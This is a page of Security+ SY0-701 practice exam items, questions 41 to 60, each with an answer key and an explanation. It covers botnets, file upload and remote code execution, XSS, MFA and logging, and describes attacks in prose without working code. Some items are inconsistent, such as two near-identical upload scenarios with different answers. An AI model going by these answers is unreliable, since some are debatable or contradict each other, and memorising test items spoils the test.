CompTIA SY0-701 Security+ Exam Dumps and Practice Test Questions Set3 Q 41-60

Visit here for our full CompTIA SY0-701 Security+ exam dumps and practice test questions.

Q41. A security analyst notices that multiple endpoints on the corporate network are sending large amounts of outbound traffic to unknown external IP addresses at unusual hours. The traffic appears to be encrypted and is not associated with legitimate business applications. Which type of malicious activity is most likely occurring?

A. Botnet activity
B. Ransomware
C. Keylogger operation
D. Rootkit installation

Answer: A. Botnet activity

Explanation:

Botnet activity is correct. Botnets are networks of compromised devices controlled remotely by attackers, often using command-and-control (C2) infrastructure. Compromised endpoints may participate in distributed denial-of-service (DDoS) attacks, cryptocurrency mining, spam campaigns, or data exfiltration. Indicators of botnet activity include:

High-volume outbound traffic to suspicious or unknown IP addresses.

Periodic beaconing patterns, often encrypted, used to communicate with C2 servers.

Occurrence during off-hours when normal user activity is minimal.

In this scenario, multiple endpoints are behaving abnormally, sending encrypted traffic outside normal business patterns. This suggests a coordinated, automated operation—characteristic of botnets. Detection involves network monitoring for unusual traffic, intrusion detection systems, and anomaly-based behavioral analytics. Mitigation strategies include isolating affected endpoints, updating endpoint security software, blacklisting known malicious IPs, and remediating vulnerabilities exploited to compromise systems. Botnets often rely on malware infections like Trojans, worms, or rootkits to establish persistence, meaning addressing the underlying infection is essential to fully neutralize the threat.

Ransomware encrypts files and demands payment but typically manifests as a visible disruption to users rather than continuous, covert network communication. While ransomware may send outbound data during infection, the pattern of ongoing encrypted traffic across multiple endpoints is more indicative of a botnet.

Keylogger operations focus on capturing keystrokes and credentials, often transmitting small packets of sensitive information. The large outbound traffic observed in the scenario does not align with typical keylogger behavior.

Rootkit installation could be present on compromised endpoints, but rootkits themselves are tools for maintaining stealth and persistence rather than generating large-scale outbound network activity. While rootkits may facilitate botnet infections, the primary observable behavior here is characteristic of botnet traffic.

Botnet infections represent a serious security risk because they can be used to launch further attacks, hide the attacker’s identity, or create long-term access into a network. Proactive defense includes endpoint protection, network segmentation, anomaly detection, and user awareness to prevent initial infection.

Q42. During a security assessment, a penetration tester discovers that a web application allows users to upload files without any restrictions. The tester uploads a malicious script, which the server executes with elevated privileges. What type of vulnerability is being exploited?

A. Cross-site scripting
B. Insecure direct object reference
C. Unrestricted file upload
D. SQL injection

Answer: C. Unrestricted file upload

Explanation:

Cross-site scripting (XSS) targets client browsers by injecting malicious scripts into web pages, affecting the users rather than the server itself. XSS does not typically allow server-side code execution or privilege escalation.

Insecure direct object reference (IDOR) occurs when applications expose internal objects (like files or database records) directly to users without proper authorization checks. While serious, IDOR is unrelated to file upload functionality.

Unrestricted file upload is correct. Allowing users to upload files without validating content, file type, or size can lead to remote code execution (RCE) if malicious scripts are executed on the server. Attackers may leverage this vulnerability to gain administrative privileges, move laterally, or establish persistent backdoors. Key security measures include:

Restricting allowed file types and enforcing strong content-type validation.

Renaming files to avoid predictable execution paths.

Storing uploaded files outside of web-accessible directories.

Using sandbox environments to process files safely.

Insecure file upload vulnerabilities are common in web applications and represent a significant risk because they provide attackers with direct access to server resources. Exploitation can result in complete system compromise, data theft, or the deployment of malware. Mitigation includes input validation, secure storage practices, and monitoring for abnormal server behavior.

SQL injection exploits unsanitized input to manipulate database queries, which is unrelated to file uploads unless the upload function interacts with database fields insecurely.

By addressing unrestricted file upload vulnerabilities, organizations reduce the risk of server compromise and protect sensitive data while maintaining application availability.

Q43. An organization wants to enforce a policy where only corporate-approved devices can access internal applications, and access is revoked immediately if a device falls out of compliance. Which security framework or concept best supports this requirement?

A. Zero Trust Architecture
B. Traditional perimeter security
C. Role-based access control
D. Mandatory access control

Answer: A. Zero Trust Architecture

Explanation:

Zero Trust Architecture (ZTA) is correct. ZTA operates on the principle “never trust, always verify.” Instead of relying solely on perimeter security, it enforces continuous verification of users and devices, limiting access based on compliance, context, and risk. Key components include:

Device posture assessment to ensure security standards like encryption, antivirus, and OS updates.

Continuous authentication and authorization for each access request.

Micro-segmentation to limit lateral movement if a device is compromised.

Immediate revocation of access when a device becomes non-compliant.

The scenario demonstrates a requirement for strict device validation, which aligns perfectly with zero trust principles. Implementing ZTA reduces risk from compromised devices, insider threats, and unauthorized access, especially in hybrid or cloud environments.

Traditional perimeter security assumes that once inside the network, users and devices are trusted. This approach is ineffective in modern environments with remote work and cloud services, as it does not enforce dynamic access controls.

Role-based access control (RBAC) assigns permissions based on user roles. While RBAC limits access based on job function, it does not account for device compliance or real-time verification.

Mandatory access control (MAC) enforces policies dictated by a central authority based on classification labels. MAC does not dynamically evaluate device posture or compliance, making it insufficient for the scenario.

Zero trust ensures that even if a device or user account is compromised, access is continuously evaluated, reducing the likelihood of breaches. This framework has become a cornerstone of modern cybersecurity strategies, especially for organizations with cloud-dependent infrastructure and remote workforces.

Q44. A system administrator observes that multiple accounts have been locked out after a short period of repeated login attempts. Upon review, it is discovered that attackers attempted a few common passwords across many accounts. Which mitigation technique would be most effective?

A. Increasing password complexity
B. Implementing account lockout policies
C. Enforcing multi-factor authentication
D. Monitoring failed logins

Answer: C. Enforcing multi-factor authentication

Explanation:

Increasing password complexity helps prevent simple guessing attacks, but password spraying attacks often exploit common or reused passwords across accounts, meaning complexity alone may not suffice.

Implementing account lockout policies can prevent brute-force attempts, but attackers may still succeed by targeting multiple accounts with minimal attempts. Lockouts also risk disrupting legitimate users if improperly tuned.

Enforcing multi-factor authentication (MFA) is correct. MFA requires users to provide an additional verification factor, such as a TOTP, SMS code, or hardware token. Even if an attacker guesses a password, access is blocked without the second factor. MFA significantly reduces the effectiveness of password spraying attacks. It is widely recognized as one of the most effective defensive measures against credential-based threats.

Monitoring failed logins is useful for detection and alerting but does not prevent attackers from attempting password spraying unless paired with other controls like MFA or lockout policies.

MFA, combined with account monitoring and user education about password hygiene, creates a layered defense that drastically reduces the risk of account compromise from credential-based attacks. Organizations often deploy MFA selectively for high-risk systems or universally to protect sensitive data and services.

Q45. During an incident response, analysts discover that a malicious actor exploited a vulnerability in a publicly facing web server to install malware that communicates with an external command-and-control server. Which stage of the cyber kill chain does this activity represent?

A. Reconnaissance
B. Delivery
C. Installation
D. Command and Control

Answer: D. Command and Control

Explanation:

Reconnaissance involves gathering information about a target, such as network topology, public services, and employee details. This stage precedes the actual exploitation.

Delivery refers to the method by which the attacker transmits the payload, such as via phishing emails, malicious links, or exploited vulnerabilities. In this scenario, the payload has already been delivered.

Installation occurs when malware is executed on the target system to establish a foothold. While installation is part of the process, the malware here is already active and communicating externally.

Command and Control (C2) is correct. This stage involves the attacker remotely controlling the compromised system, issuing commands, exfiltrating data, or performing lateral movement. The observed communication with an external C2 server indicates that the attacker has progressed to this phase. Monitoring outbound traffic, identifying suspicious connections, and blocking C2 channels are critical for disrupting the attack and preventing further compromise.

C2 activity is particularly dangerous because it allows attackers to maintain persistence, coordinate multi-stage attacks, and adapt to defensive measures. Effective detection requires network traffic analysis, anomaly detection, threat intelligence integration, and endpoint monitoring to identify unusual patterns indicative of C2 activity.

 Q46. A security team detects that a previously unknown external IP address is continuously scanning their network for open ports and running services. The scanning pattern covers a wide range of IP addresses and occurs over several days. Which type of activity is most likely being observed?

A. Vulnerability scanning
B. Port scanning
C. Exploitation
D. Denial-of-service attack

Answer: B. Port scanning

Explanation:

Vulnerability scanning is a process that aims to identify specific weaknesses within systems. It typically involves running software tools to test for missing patches, outdated configurations, or misconfigured services. While vulnerability scanning is often preceded by port scanning, it is more focused and targeted, looking for specific exploitable weaknesses rather than just identifying open network services. Vulnerability scanners such as Nessus, OpenVAS, and Qualys not only detect open ports but also analyze services running on those ports, cross-referencing against known vulnerabilities databases (like CVEs). However, in the scenario described, there is no evidence of exploitation or targeted weakness analysis—just repeated scanning, making this option less likely.

Port scanning is correct. Port scanning is a form of reconnaissance in which attackers or security analysts attempt to discover open ports, services, and listening applications on one or more network hosts. The key purpose is to map the attack surface and identify potential points of entry. Indicators of port scanning include:

• Systematic connection attempts to a range of ports on a single host or multiple hosts.

• Traffic patterns that may be sequential, random, or interleaved depending on the scanning methodology.

• Repeated connections from a single IP or from multiple IP addresses (distributed scanning) over time.

Port scanning can be conducted using tools such as Nmap, Masscan, or custom scripts, which allow attackers to scan thousands of ports in minutes. The scenario mentions scanning over several days, which often indicates stealthy automated tools designed to avoid triggering intrusion detection systems (IDS) or firewalls. Large-scale scanning across multiple IPs may indicate reconnaissance by a botnet or a sophisticated threat actor looking to map an entire network or subnet.

• Organizations can defend against port scanning through multiple strategies:
• Deploying IDS/IPS systems: These can detect unusual traffic patterns and flag sequential or abnormal connections.

• Rate-limiting and throttling connections: Prevents automated tools from scanning at high speed.

• Firewalls and access control lists (ACLs): Restrict unnecessary exposure of ports to the internet.

Honeypots: Decoy systems can detect scanning and provide intelligence about attacker methods without exposing real assets.

Exploitation refers to the phase in an attack where the attacker takes advantage of discovered vulnerabilities to compromise systems. Since the activity described is reconnaissance rather than the active use of vulnerabilities, this option does not apply. Exploitation would be evidenced by successful logins, malware deployment, or configuration changes rather than mere scanning.

Denial-of-service (DoS) attacks aim to overwhelm system resources, making services unavailable. While certain scanning tools can produce noticeable traffic, standard port scans generally do not consume sufficient bandwidth or system resources to result in service disruption. Thus, the activity described aligns with reconnaissance, not service disruption.

Port scanning is a foundational part of the cyber kill chain. Early detection of scanning attempts allows security teams to respond proactively, reducing the likelihood of later exploitation. Techniques such as network segmentation, traffic monitoring, and anomaly detection can identify and mitigate reconnaissance attempts before attackers gain actionable intelligence.

Q47. During a forensic investigation, an analyst discovers that a critical system has been modified without authorization. A detailed audit trail shows the exact user account that made each change. Which security principle does this scenario demonstrate?

A. Confidentiality
B. Integrity
C. Accountability
D. Availability

Answer: C. Accountability

Explanation:

Confidentiality ensures that sensitive data is protected from unauthorized access. While important, confidentiality alone does not provide visibility into who performed actions or modifications. Confidentiality protects against external exposure but does not inherently enforce traceability.

Integrity is about ensuring that data remains accurate and unaltered. While unauthorized modifications indicate a breach of integrity, integrity by itself does not identify the actor responsible for the change. Audit trails and logs are required to link actions to users.

Accountability is correct. Accountability is a principle that ensures that all actions taken within a system are traceable to a responsible individual or entity. Accountability is implemented through mechanisms such as:

• Unique user authentication: Ensures that each system user has a distinct identity for tracking purposes.

• Comprehensive logging: System and application logs must record all critical actions, including creation, deletion, or modification of resources.

• Immutable audit trails: Using append-only logs or WORM (write-once-read-many) storage ensures that logs themselves cannot be tampered with, maintaining trustworthiness.
  

In the scenario, the forensic analyst could attribute changes to a specific user account. This ensures that malicious or accidental changes are traceable, enabling proper incident response and regulatory compliance. Industries governed by standards like PCI DSS, HIPAA, ISO 27001, or SOX mandate strong accountability measures to support audits and investigations.

Availability ensures that systems and data remain accessible when needed. While availability is crucial for operational continuity, it does not track or attribute user actions.

Accountability complements confidentiality, integrity, and availability (the CIA triad) to create a complete security posture. Without accountability, unauthorized changes could go unnoticed, leading to potential regulatory violations or operational damage. Effective accountability allows organizations to:

• Deter malicious behavior by making users aware their actions are monitored.

• Detect insider threats quickly by reviewing user-specific logs.

• Support forensic investigations and legal proceedings with reliable evidence.
  

Q48. A company wants to protect sensitive files stored in a shared cloud environment so that even the cloud provider cannot access the content. The organization generates, manages, and stores the encryption keys internally. Which encryption model does this scenario describe?

A. Provider-managed encryption
B. Customer-managed encryption with provider key storage
C. Customer-managed encryption with customer key storage
D. Provider-managed encryption with customer key storage

Answer: C. Customer-managed encryption with customer key storage

Explanation:

Provider-managed encryption means the cloud provider generates, stores, and manages the encryption keys. This protects data at rest from casual access but still allows the provider technical access to decrypt data if necessary, making it unsuitable for scenarios requiring full control by the customer.

Customer-managed encryption with provider key storage allows the customer to configure encryption policies but stores keys on the provider’s infrastructure. While this improves control compared to provider-managed encryption, the provider still has potential access to the keys, reducing confidentiality.

• Customer-managed encryption with customer key storage is correct. Key characteristics include:
• Full customer control over key generation, rotation, storage, and destruction.

• Keys may be stored in hardware security modules (HSMs) under organizational control or in secure offline vaults.

• The cloud provider cannot decrypt the data, even if breached, maintaining strong data confidentiality.
  

This approach is essential for compliance with GDPR, HIPAA, financial regulations, or any scenario where sensitive data must remain inaccessible to third-party providers. Robust key management practices include:

• Key lifecycle management: Creation, rotation, and revocation procedures.

• Secure storage: Using HSMs or offline storage to prevent unauthorized access.

• Access controls: Restricting key use to authorized personnel and applications.

• Backup and recovery: Ensuring data remains decryptable even if keys are lost.

Provider-managed encryption with customer key storage is not practical since providers cannot manage keys they do not control.

Customer-managed encryption ensures maximal control over data confidentiality while still leveraging cloud storage capabilities. Organizations maintain autonomy over sensitive data and minimize the risk of insider access from the provider.

Q49. A security administrator discovers that an employee’s account has been compromised due to reuse of credentials from a previous data breach. Automated tools are being used to attempt access to multiple internal systems using these credentials. Which type of attack is being conducted?

Brute-force attack
B. Credential stuffing
C. Password spraying
D. Keylogging

Answer: B. Credential stuffing

Explanation:

Brute-force attack attempts all possible password combinations against a single account. Brute-force is resource-intensive, slower, and does not rely on previously exposed credentials.

Credential stuffing is correct. Credential stuffing exploits the common practice of password reuse. Attackers take usernames and passwords from prior breaches and automate login attempts across multiple platforms. Key indicators:

• Rapid login attempts across different accounts.

• Use of known leaked credentials.

• Attempts from multiple geographic locations or IP addresses.

• Mitigation strategies:
• Multi-factor authentication (MFA): Even if passwords are reused, MFA prevents unauthorized access.

• Password hygiene policies: Enforce unique, strong passwords for each system.

• Monitoring and alerting: Detect abnormal login patterns.

• User awareness training: Educate employees on avoiding password reuse.

Password spraying attempts a few common passwords across many accounts without prior knowledge of credentials. While similar in automation, it is less targeted than credential stuffing.

Keylogging involves malware recording keystrokes to capture credentials. It is unrelated to automated login attempts using stolen credentials.

Credential stuffing is a major threat in enterprise environments due to frequent password reuse. Organizations must combine technical controls (MFA, monitoring) and user education to mitigate the risk effectively.

Q50. A penetration tester finds that a Linux server has a root-owned cron job that executes a script every few minutes. The script is writable by all users. Which attack could be performed next?

A. Privilege escalation
B. Lateral movement
C. Credential harvesting
D. Pivoting

Answer: A. Privilege escalation

Explanation:

Privilege escalation is correct. In this scenario, the cron job executes a script with root privileges but is writable by all users. An attacker can insert malicious commands into the script, which will execute with root permissions when the cron job runs. This is a classic example of exploiting misconfigured file permissions to elevate privileges. Steps include:

• Modifying the script to add commands that grant root access.

• Waiting for automatic execution to gain elevated privileges.

• Securing persistent root access for further testing or exploitation.
  

Lateral movement involves moving from one compromised system to others in the network. While privilege escalation may enable lateral movement, it is not the immediate action.

Credential harvesting targets stored passwords or tokens. This scenario is about exploiting file permissions, not capturing credentials.

Pivoting is using a compromised host to attack other systems. Privilege escalation may enable pivoting later but is not the immediate attack.

Misconfigured cron jobs are a common Linux vulnerability. Prevention requires proper file permissions, least privilege enforcement, and regular security audits. Organizations should ensure scripts run with restricted access and that administrative processes are monitored for anomalies.

Q51. A security analyst observes that an internal employee account is attempting to access files outside its normal role-based permissions. Multiple alerts indicate access attempts on sensitive HR and finance directories. Which type of threat is most likely occurring?

A. Insider threat
B. Advanced persistent threat
C. External phishing attack
D. Ransomware attack

Answer: A. Insider threat

Explanation:

Insider threat is correct. Insider threats occur when employees, contractors, or other authorized individuals misuse their legitimate access to harm the organization. In this scenario, the account is attempting to access sensitive resources beyond its normal privileges, which is a hallmark of malicious insider activity. Insider threats can be malicious (intentional theft or sabotage) or negligent (unintentional policy violations), and they often bypass traditional security controls since the actor already has valid credentials. Indicators of insider threats include:

• Unusual access patterns such as repeated attempts to open restricted files.

• Access during unusual hours or from unexpected locations.

• Attempts to bypass monitoring or security controls.

• Exfiltration of sensitive data or copying large amounts of information to personal drives.

• Mitigation strategies include:
• Behavioral analytics: Monitor access patterns for deviations from normal behavior.
  
• Role-based access control (RBAC): Enforce least privilege to limit access to only necessary resources.

• Separation of duties: Ensure critical processes require multiple authorized individuals.

• Logging and auditing: Maintain detailed, immutable logs to detect and investigate unauthorized access attempts.

• User education and awareness: Train employees on acceptable access practices and reporting suspicious activities.

Advanced persistent threat (APT) involves long-term, targeted attacks, typically by external actors or organized groups. While some APTs may leverage insider accounts, the scenario specifically involves an internal employee account acting outside its normal privileges, which aligns more closely with insider threats.

External phishing attack typically relies on tricking users into revealing credentials or installing malware. There is no evidence here of external compromise; the activity is originating from a legitimate internal account.

Ransomware attack involves encrypting data to demand payment. The scenario describes access attempts, not encryption or system disruption, so ransomware is not relevant.

Insider threats are a leading cause of data breaches and compliance failures. Studies indicate that insider activity accounts for nearly 30% of data breaches in large enterprises. By implementing continuous monitoring, behavioral analysis, and strong access controls, organizations can detect early warning signs and mitigate the risk of insider misuse.

 

Q52. A penetration tester is evaluating a web application and discovers that user input fields accept HTML tags without proper sanitization, allowing scripts to execute in other users’ browsers. Which type of attack is demonstrated?

A. SQL injection
B. Cross-site scripting
C. Command injection
D. XML external entity attack

Answer: B. Cross-site scripting (XSS)

Explanation:

SQL injection exploits unsanitized input to manipulate database queries. SQL injection allows attackers to exfiltrate or modify database content but does not directly execute scripts in users’ browsers.

Cross-site scripting (XSS) is correct. XSS occurs when an attacker injects malicious scripts into web pages that are viewed by other users. These scripts execute in the victim’s browser, potentially allowing attackers to steal cookies, session tokens, or perform actions on behalf of the user. Types of XSS include:

Stored XSS: Malicious code is permanently stored on the server (e.g., in databases or forums).

Reflected XSS: Code is reflected back immediately in response to a user request, such as through a URL parameter.

DOM-based XSS: Exploits the Document Object Model in the client browser to execute code.

Mitigation strategies:

Input validation: Ensure user input contains only expected characters.

Output encoding: Encode HTML, JavaScript, and CSS outputs to prevent execution.

Content security policy (CSP): Restrict scripts that can be executed in the browser.

Web application firewalls (WAFs): Detect and block common XSS payloads.

Command injection occurs when user input is executed as an operating system command. Unlike XSS, command injection affects the server, not the client browser.

XML external entity (XXE) attack exploits XML parsers to access local files or cause server-side denial-of-service. XXE does not execute scripts in clients’ browsers.

XSS is one of the most common web application vulnerabilities and is ranked highly in the OWASP Top 10. Successful XSS attacks can lead to session hijacking, account takeover, and phishing attacks executed directly within a trusted site.

Q53. An organization wants to implement a security model where users can only perform actions on resources for which they have been explicitly authorized, and access decisions are enforced based on strict classification levels. Which model should be implemented?

A. Discretionary access control (DAC)
B. Role-based access control (RBAC)
C. Mandatory access control (MAC)
D. Attribute-based access control (ABAC)

Answer: C. Mandatory access control (MAC)

Explanation:

Discretionary access control (DAC) allows owners of resources to determine access. DAC is flexible but not strict—users can share permissions with others. This model is unsuitable when strict enforcement of access based on classification is required.

Role-based access control (RBAC) assigns permissions to roles rather than individuals. RBAC simplifies administration but does not enforce strict classification-based restrictions unless combined with additional policies.

Mandatory access control (MAC) is correct. MAC enforces access decisions based on predefined policies, such as security labels (e.g., Confidential, Secret, Top Secret). Users cannot override these policies, ensuring strict enforcement. Key characteristics:

Centralized control: A system administrator defines policies that cannot be modified by end users.

Classification enforcement: Access to sensitive resources is granted strictly based on clearance and resource classification.

Use cases: Military, government, and high-security environments where policy compliance is mandatory.

Implementation considerations include:

Security labeling: Assign sensitivity levels to files, applications, and network resources.

Policy enforcement mechanisms: Use operating systems or middleware that support MAC (e.g., SELinux, AppArmor).

Auditing: Track attempts to access resources beyond authorized levels.

Attribute-based access control (ABAC) grants access dynamically based on user attributes, resource attributes, and context. ABAC is more flexible than MAC but is not strictly based on classification enforcement.

MAC is widely used in high-security environments where strict access enforcement is critical to prevent unauthorized disclosure of sensitive information.

Q54. A security team observes that a particular system in the network exhibits unusually high CPU usage and large volumes of outbound traffic. Further analysis shows encrypted traffic communicating with external IPs at irregular intervals. Which type of attack is most likely occurring?

A. Ransomware
B. Botnet command and control
C. SQL injection
D. Privilege escalation

Answer: B. Botnet command and control (C2)

Explanation:

Ransomware encrypts local or network files and demands payment. High CPU usage may occur during encryption, but ransomware typically exhibits immediate file-locking behavior, not continuous outbound network traffic with encrypted communications.

Botnet command and control (C2) is correct. Botnets are networks of compromised systems that receive commands from an external controller. Indicators of botnet activity include:

High CPU or memory usage: Often due to mining cryptocurrency or processing commands.

Outbound network connections: Communication with C2 servers may be encrypted and sporadic to evade detection.

Abnormal traffic patterns: Regularly contacting unknown IPs, often at irregular intervals to avoid firewall scrutiny.

Mitigation strategies:

Network monitoring: Use IDS/IPS to detect unusual traffic patterns or beaconing behavior.

Endpoint detection and response (EDR): Identify anomalous processes consuming high resources.

Threat intelligence feeds: Block known malicious IP addresses and domains.

Segmentation: Isolate compromised systems to prevent lateral movement.

SQL injection affects database queries and does not typically cause high CPU usage or encrypted outbound network traffic at irregular intervals.

Privilege escalation is a local attack aimed at gaining higher access on a single host. While it may precede other attacks, the network-wide traffic behavior described aligns more with botnet C2 activity.

Botnets remain a critical threat vector for distributed denial-of-service (DDoS), spam campaigns, cryptocurrency mining, and lateral propagation. Organizations must proactively monitor endpoints and network flows to detect early botnet compromise.

Q55. During a penetration test, an analyst finds that a web application accepts file uploads but does not validate the file type or content. By uploading a malicious script and executing it through the server, the tester can gain shell access. What type of vulnerability is this?

A. Remote code execution
B. SQL injection
C. Cross-site request forgery
D. Insecure deserialization

Answer: A. Remote code execution (RCE)

Explanation:

Remote code execution (RCE) is correct. RCE occurs when an attacker can execute arbitrary code on a target system. In this scenario, the application’s file upload functionality lacks proper validation or sanitization, allowing the tester to execute scripts or binaries on the server. RCE is one of the most critical vulnerabilities because it provides full control over the target system.

Indicators of RCE include:

• Uploading scripts (PHP, Python, or shell scripts) and executing them via HTTP requests.

• Unauthorized creation or modification of files on the server.

• Unexpected processes running under the application’s user account.

• Mitigation strategies:
• Input validation: Restrict uploaded files to specific types and verify MIME types.

• Sandboxing: Execute files in isolated environments to prevent system compromise.

• Access controls: Limit the privileges of processes handling uploaded content.

• Patch management: Ensure all application frameworks and libraries are up to date.

SQL injection exploits database queries, not arbitrary file execution.

Cross-site request forgery (CSRF) forces users to perform unintended actions but does not allow code execution on the server.

Insecure deserialization involves deserializing untrusted data but does not apply directly to file upload functionality unless the uploaded file contains serialized objects.

RCE is classified as a critical vulnerability in OWASP Top 10 due to the severe consequences of server compromise. Protecting web applications from RCE requires strict input validation, least privilege enforcement, and robust monitoring.

Q56. A network administrator detects unusual outbound traffic from multiple workstations to unknown external IP addresses. Malware analysis shows that the workstations are part of a botnet used for cryptocurrency mining without user consent. Which type of malware is responsible?

A. Trojan
B. Worm
C. Botnet malware
D. Spyware

Answer: C. Botnet malware

Explanation:

Trojan is a type of malware that masquerades as legitimate software to trick users into executing it. While Trojans can deliver payloads like ransomware, spyware, or botnet agents, the primary scenario involves coordinated activity across multiple systems, which is more indicative of botnet malware rather than an isolated Trojan infection.

Worm is self-replicating malware that spreads automatically across networks, often without user interaction. Worms may propagate a botnet infection but do not by themselves explain coordinated, controlled mining activity to external servers.

Botnet malware is correct. Botnets are networks of compromised devices (bots) that are remotely controlled by an attacker through a command-and-control (C2) server. In this scenario, several key indicators point to a botnet:

Unusual outbound traffic: Bots often communicate with C2 servers over unusual ports, using encrypted traffic to avoid detection.

Resource exploitation: The CPU and GPU utilization is abnormally high due to cryptocurrency mining.

Scale of infection: Multiple workstations participating indicates a coordinated attack, characteristic of botnets.

Botnets have many malicious applications, including:

Distributed Denial-of-Service (DDoS) attacks.

Spam campaigns.

Cryptojacking (unauthorized cryptocurrency mining).

Data exfiltration or espionage.

Mitigation strategies include:

Endpoint detection and response (EDR): Identify processes consuming high resources or connecting to suspicious IPs.

Network monitoring: Track and block communication with known malicious C2 servers.

Patch management: Prevent exploitation of vulnerabilities that allow malware installation.

User awareness: Educate users about phishing campaigns and suspicious downloads.

Spyware collects sensitive user information, such as browsing activity, credentials, or system data. Spyware is primarily focused on surveillance, not on coordinating a distributed network for cryptojacking.

Botnet malware represents a high-risk threat because it leverages internal resources for attacker benefit while remaining largely undetected. Organizations should combine proactive network monitoring, endpoint protection, and threat intelligence to identify botnet activity before it escalates.

Q57. During a security assessment, a penetration tester finds that a company’s web application stores session tokens in URLs instead of secure cookies. Attackers could steal these tokens and impersonate users. Which type of vulnerability is present?

A. Cross-site scripting (XSS)
B. Session fixation
C. Insecure session management
D. Cross-site request forgery (CSRF)

Answer: C. Insecure session management

Explanation:

Cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users. While XSS can be used to steal session tokens, the vulnerability described is inherent to how the application manages sessions, not script injection.

Session fixation occurs when an attacker forces a user to use a known session ID, then hijacks the session once the user logs in. While related to session security, session fixation is different from improper token storage in URLs.

Insecure session management is correct. Session management ensures that user sessions are securely created, maintained, and invalidated. Storing session tokens in URLs is insecure because:

URLs are often logged in server logs, browser history, and shared in referrer headers.

Tokens can be leaked through social engineering or phishing.

Tokens may remain valid for long periods, increasing exposure.

Best practices for session management include:

Secure cookies: Use HTTPOnly and Secure flags to protect tokens.

Session expiration: Enforce timeouts and inactivity limits.

Regenerate tokens: Upon login or privilege changes to prevent session fixation.

Encryption: Protect tokens during transmission with TLS/HTTPS.

Cross-site request forgery (CSRF) tricks a user into performing unintended actions but does not directly relate to session token storage practices.

Insecure session management is one of the top web vulnerabilities because it directly enables attackers to impersonate legitimate users. By enforcing secure token storage, regeneration, and validation, organizations can protect session integrity.

Q58. A financial organization wants to implement multi-factor authentication (MFA) for all employees. They plan to use a combination of something the user knows (password), something the user has (TOTP token), and something the user is (fingerprint). Which type of authentication is being implemented?

A. Single-factor authentication
B. Two-factor authentication
C. Multi-factor authentication
D. Risk-based authentication

Answer: C. Multi-factor authentication (MFA)

Explanation:

Single-factor authentication uses only one type of credential, such as a password. It provides minimal protection and is insufficient for sensitive financial environments.

Two-factor authentication (2FA) combines exactly two factors, usually something you know and something you have. While more secure than single-factor authentication, it is limited to two forms of validation.

Multi-factor authentication (MFA) is correct. MFA involves two or more distinct authentication factors, typically categorized as:

Something you know: Passwords or PINs.

Something you have: Hardware tokens, TOTP apps, smart cards.

Something you are: Biometrics like fingerprints, facial recognition, or iris scans.

In this scenario, the organization implements all three factors, significantly increasing security by reducing the likelihood of compromise even if one factor is exposed. Benefits of MFA include:

Preventing account compromise through stolen credentials.

Reducing phishing risk.

Aligning with regulatory requirements (e.g., PCI DSS, NIST SP 800-63).

Risk-based authentication evaluates risk factors, such as geolocation or device reputation, to adjust authentication requirements dynamically. While complementary to MFA, it is not the primary method described.

MFA is essential for protecting sensitive financial accounts and critical corporate systems. Adoption of MFA reduces attack surfaces and improves overall resilience against credential-based attacks.

Q59. During a penetration test, an analyst identifies that the company’s web application allows uploading of ZIP archives containing scripts. When uploaded, the scripts execute on the server, providing shell access. What type of vulnerability is present?

A. Remote code execution (RCE)
B. SQL injection
C. Cross-site scripting (XSS)
D. Directory traversal

Answer: A. Remote code execution (RCE)

Explanation:

Remote code execution (RCE) is correct. RCE occurs when an attacker can execute arbitrary commands or scripts on the server. The vulnerability here arises because the application accepts archives with executable scripts, which are then processed without validation. Consequences include:

Full compromise of the web server.

Ability to read, modify, or delete sensitive data.

Potential lateral movement within the network.

Mitigation strategies:

Input validation: Reject executable content and limit file types.

Sandboxing: Execute user uploads in isolated environments.

Access control: Limit the privileges of processes handling uploaded files.

Monitoring: Detect unusual server activity or abnormal processes.

SQL injection targets databases through unsanitized queries and does not explain arbitrary server code execution.

Cross-site scripting (XSS) affects client-side code and cannot provide shell access to the server.

Directory traversal allows attackers to access unauthorized files but does not inherently execute code on the server.

RCE is highly critical and is considered one of the most severe vulnerabilities because it can provide full system control. Securing file uploads and enforcing least privilege are vital controls.

Q60. A security administrator wants to ensure that logs collected from multiple network devices cannot be tampered with, even if an attacker gains administrative access to the logging server. Which technique is most appropriate?

A. Centralized logging
B. Immutable logging
C. Log rotation
D. Log aggregation

Answer: B. Immutable logging

Explanation:

Centralized logging consolidates logs from multiple devices to a single location. While it simplifies management, it does not inherently prevent tampering if an attacker gains access to the server.

Immutable logging is correct. Immutable logs are write-once, read-many (WORM) records that cannot be modified or deleted. Key properties include:

Tamper-evident or tamper-proof storage.

Cryptographic hash chaining to detect changes.

Compliance with regulatory frameworks (e.g., PCI DSS, HIPAA, SOX).

Benefits of immutable logging:

Provides trustworthy forensic evidence.

Detects and prevents attempts to alter historical records.

Enables incident investigations with confidence in log integrity.

Implementation strategies include:

Write-once storage: Use WORM drives or object storage with immutability features.

Cryptographic hashing: Generate hashes for each log entry and verify periodically.

Append-only databases: Use systems designed to prevent deletion or modification of historical entries.

Log rotation manages log file size and retention but does not prevent tampering.

Log aggregation collects logs into a centralized system for analysis but does not guarantee immutability.

Immutable logging is a cornerstone of secure logging practices. By ensuring logs are tamper-proof, organizations can reliably investigate incidents, satisfy compliance requirements, and maintain accountability.